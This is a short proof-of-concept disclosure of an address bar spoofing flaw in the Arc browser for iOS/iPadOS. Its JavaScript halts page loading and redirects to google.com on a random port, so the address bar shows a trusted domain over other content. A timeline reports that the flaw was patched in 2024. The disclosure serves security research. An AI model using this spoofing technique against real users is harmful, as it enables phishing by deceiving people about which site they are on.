ARC Browser Address Bar Spoofing PoC - iOS/iPadOS
<script>
function spoof() {
setTimeout(() => {
window.stop();
let randomPort;
do {
randomPort = Math.floor(Math.random() * 1000);
} while (randomPort === 0 || randomPort === 443);
document.location = "https://google.com:" + randomPort + "/";
}, 300);
}
spoof();
</script>
- 2024-01-25 : Vulnerability reported to The Browser Company of New York
- 2024-01-25 : Recognized as a security vulnerability
- 2024-02-13 : Patched in the latest release